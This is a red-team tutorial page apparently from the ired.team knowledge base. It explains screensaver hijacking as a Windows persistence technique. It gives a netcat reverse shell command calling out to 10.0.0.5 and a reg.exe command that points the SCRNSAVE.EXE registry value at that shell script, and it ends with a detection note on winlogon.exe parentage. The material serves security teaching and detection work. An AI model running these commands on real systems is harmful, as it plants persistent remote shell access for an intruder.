Red Teaming Experiments
linkedintwitterpatreongithub
Search…
What is ired.team?
Pinned
Pentesting Cheatsheets
Active Directory & Kerberos Abuse
offensive security
Red Team Infrastructure
Initial Access
Code Execution
Code & Process Injection
Defense Evasion
Enumeration and Discovery
Privilege Escalation
Credential Access & Dumping
Lateral Movement
Persistence
DLL Proxying for Persistence
Schtask
Service Execution
Sticky Keys
Create Account
AddMonitor()
NetSh Helper DLL
Abusing Windows Managent Instrumentation
Windows Logon Helper
Hijacking Default File Extension
Persisting in svchost.exe with a Service DLL
Modifying .lnk Shortcuts
Screensaver Hijack
Application Shimming
BITS Jobs
COM Hijacking
SIP & Trust Provider Hijacking
Hijacking Time Providers
Installing Root Certificate
Powershell Profile Persistence
RID Hijacking
Word Library Add-Ins
Office Templates
Exfiltration
reversing, forensics & misc
Internals
Cloud
Neo4j
Dump Virtual Box Memory
AES Encryption Using Crypto++ .lib in Visual Studio C++
Reversing Password Checking Routine
Powered By GitBook
Screensaver Hijack
Hijacking screensaver for persistence.

To achieve persistence, the attacker can modify SCRNSAVE.EXE value in the registry HKCU\Control Panel\Desktop\ and change its data to point to any malicious file.
In this test, I will use a netcat reverse shell as my malicious payload:
c:\[email protected]
C:\tools\nc.exe 10.0.0.5 443 -e cmd.exe
Let's update the registry:
The same could be achieved using a native Windows binary reg.exe:
[email protected]
reg add "hkcu\control panel\desktop" /v SCRNSAVE.EXE /d c:\shell.cmd

Note the process ancestry on the victim system - the reverse shell process traces back to winlogon.exe as the parent process, which is responsible for managing user logons/logoffs. This is highly suspect and should warrant a further investigation:

Event Triggered Execution: Screensaver, Sub-technique T1546.002 - Enterprise | MITRE ATT&CK®
​
Previous
Modifying .lnk Shortcuts
Next
Application Shimming
Last modified 3yr ago
Copy link
On this page
Execution
Observations
References